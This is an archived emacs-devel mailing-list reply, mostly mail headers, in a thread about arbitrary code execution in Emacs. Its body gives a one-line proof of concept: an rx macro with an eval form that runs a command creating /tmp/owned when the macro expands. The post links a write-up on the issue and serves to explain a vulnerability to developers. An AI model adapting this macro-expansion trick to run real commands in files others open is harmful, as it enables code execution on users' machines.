From mboxrd@z Thu Jan 1 00:00:00 1970 Path: news.gmane.io!.POSTED.blaine.gmane.org!not-for-mail From: Daniel Radetsky Newsgroups: gmane.emacs.devel Subject: Re: Emacs Arbitrary Code Execution and How to Avoid It Date: Wed, 11 Dec 2024 01:37:02 -0800 Message-ID: <2jmedxxrwwdei2wsd4dd4uti4ly3v7pcnaltv4qjoycb6itrux@odeiovnegihd> References: <878qswfya2.fsf@librehacker.com> <87v7vzh4l1.fsf@stebalien.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Injection-Info: ciao.gmane.io; posting-host="blaine.gmane.org:116.202.254.214"; logging-data="25574"; mail-complaints-to="usenet@ciao.gmane.io" Cc: emacs-devel@gnu.org To: Jean Louis Original-X-From: emacs-devel-bounces+ged-emacs-devel=m.gmane-mx.org@gnu.org Wed Dec 11 10:37:45 2024 Return-path: Envelope-to: ged-emacs-devel@m.gmane-mx.org Original-Received: from lists.gnu.org ([209.51.188.17]) by ciao.gmane.io with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.92) (envelope-from ) id 1tLJA8-0006VD-PB for ged-emacs-devel@m.gmane-mx.org; Wed, 11 Dec 2024 10:37:44 +0100 Original-Received: from localhost ([::1] helo=lists1p.gnu.org) by lists.gnu.org with esmtp (Exim 4.90_1) (envelope-from ) id 1tLJ9a-0002A3-Ss; Wed, 11 Dec 2024 04:37:12 -0500 Original-Received: from eggs.gnu.org ([2001:470:142:3::10]) by lists.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1tLJ9Y-00029Z-FL for emacs-devel@gnu.org; Wed, 11 Dec 2024 04:37:08 -0500 Original-Received: from mail-pl1-x62c.google.com ([2607:f8b0:4864:20::62c]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_128_GCM_SHA256:128) (Exim 4.90_1) (envelope-from ) id 1tLJ9W-0003I4-R5 for emacs-devel@gnu.org; Wed, 11 Dec 2024 04:37:08 -0500 Original-Received: by mail-pl1-x62c.google.com with SMTP id d9443c01a7336-2161eb95317so46669005ad.1 for ; Wed, 11 Dec 2024 01:37:06 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20230601; t=1733909825; x=1734514625; darn=gnu.org; h=in-reply-to:content-disposition:mime-version:references:message-id :subject:cc:to:from:date:from:to:cc:subject:date:message-id:reply-to; bh=ulp9Ij+/hfybOVxWaqYSu/EnQt+swon7kGxuR6HjAvI=; b=ZYFgKR5rhy6ZEP10O7/eTvuEXynwe5fwU+k4ESM5VbjebdrXYojwRjsVmpDzaFw/tE CGhA1SafkWL2y3SE+m9QM+UfoD2JRiLWuCsVas0rVBu9hOZ/c0aivOwCRsUAaxFlpYu8 ZUs3sSxRY/NyRdBI9IadQqZTu/FdJ5OlM0PRkaWj2gKsxk88mXlF98+TWl+uafZlY6AI f8RrW2htgiztAODUXBECqOQ+/6NPl03MdC+oZiOrMqxiAliXFx93wJAmizcwtt0yA7ft P47T1Rjv9rq/Rvrzt7v1CxseYBhJ0rinpCyHuc/A/6n0u615EYEjZPFfIdwChzfpD/9p PUJg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20230601; t=1733909825; x=1734514625; h=in-reply-to:content-disposition:mime-version:references:message-id :subject:cc:to:from:date:x-gm-message-state:from:to:cc:subject:date :message-id:reply-to; bh=ulp9Ij+/hfybOVxWaqYSu/EnQt+swon7kGxuR6HjAvI=; b=sztZjPJ4XnS2CjvAC7vqxTPS5lX2FAuKBemWTnlUc/dWtw1bMFjz3nOaoDHF2a0Ceu gTYKJq6eKYKpS5WOvPQjh0yO+lyM+17/a0T8ReAvKFowJqn5LDCdNPk+jcwEf5CiTpgh boRnR+ieajwjIID1JV2b+Na0Qyz8WwYP1YuZo/dLAk3vww4s6+PB+BPAw7UOcMu8O3hK TazzfoLhZ2KqSmFbvohp6wGA8sXQdCVdDTYC8XJQfUVX1ui7ZweGUrhQwi19YVM5e/6t OU+int1DgghJ0Lkoq8MgOBBe8WphI9KUfShehI7C48lh3ff5aG2Xz/ziuEQrov7fG8We Viig== X-Gm-Message-State: AOJu0Yy3cRlg+DgriaBLbVCFM4R6vsc4Lfqac4pJk91TEZ5WrhZ/hvmc xUBdsDi1sODM9yqrm2EXVh0EtDZujYaXJT79Wa2iqgKsaa+TGLXg3raum/2v X-Gm-Gg: ASbGnctUckLKVbU5yOWTQ8Ugzjyah/ht26VbbbWdqIXCeiZGnQyNzd7RdhJwbj/40RK Vdt7AcflWi/IFm5VAYnrgckCGELCGbmirute9r3aw7rzqr9wsFw1PXFSDilOe+/7tTpB2KwfmUT AuK2pHzleitGtKkNVeudoeO12ukPm7ZIwohmOAZg26k2rXL7RqCMSYCRgvxti+LhcHdg+9yyu7Z wlf/y8yxLrLvS9znjY1Po80TJ8hBFVvkYCbze1aDnr3zJ4= X-Google-Smtp-Source: AGHT+IEDkz4A2qSJeMH08jwGyouuFh7KZTaDFWlmmzVjzwXeWzEEpSoErN2vIv5uqLKPLqttga2v5A== X-Received: by 2002:a17:903:1c2:b0:216:1ad2:1d5 with SMTP id d9443c01a7336-21778549cf8mr34249175ad.41.1733909825233; Wed, 11 Dec 2024 01:37:05 -0800 (PST) Original-Received: from flap ([2601:645:8a81:69c0:d71a:6c57:66f9:6932]) by smtp.gmail.com with ESMTPSA id d9443c01a7336-215f8ef9fcdsm102764895ad.146.2024.12.11.01.37.04 (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256); Wed, 11 Dec 2024 01:37:04 -0800 (PST) Content-Disposition: inline In-Reply-To: Received-SPF: pass client-ip=2607:f8b0:4864:20::62c; envelope-from=dradetsky@gmail.com; helo=mail-pl1-x62c.google.com X-Spam_score_int: -20 X-Spam_score: -2.1 X-Spam_bar: -- X-Spam_report: (-2.1 / 5.0 requ) BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, DKIM_VALID_EF=-0.1, FREEMAIL_FROM=0.001, RCVD_IN_DNSWL_NONE=-0.0001, SPF_HELO_NONE=0.001, SPF_PASS=-0.001 autolearn=ham autolearn_force=no X-Spam_action: no action X-BeenThere: emacs-devel@gnu.org X-Mailman-Version: 2.1.29 Precedence: list List-Id: "Emacs development discussions." List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: emacs-devel-bounces+ged-emacs-devel=m.gmane-mx.org@gnu.org Original-Sender: emacs-devel-bounces+ged-emacs-devel=m.gmane-mx.org@gnu.org Xref: news.gmane.io gmane.emacs.devel:326335 Archived-At: On Wed, Dec 11, 2024 at 12:25:24PM +0300, Jean Louis wrote: > Send me the working example of dangerous macro, that I can see how it > works, thank you. Make (rx (eval (call-process "touch" nil nil nil "/tmp/owned"))) see also: https://eshelyaron.com/posts/2024-11-27-emacs-aritrary-code-execution-and-how-to-avoid-it.html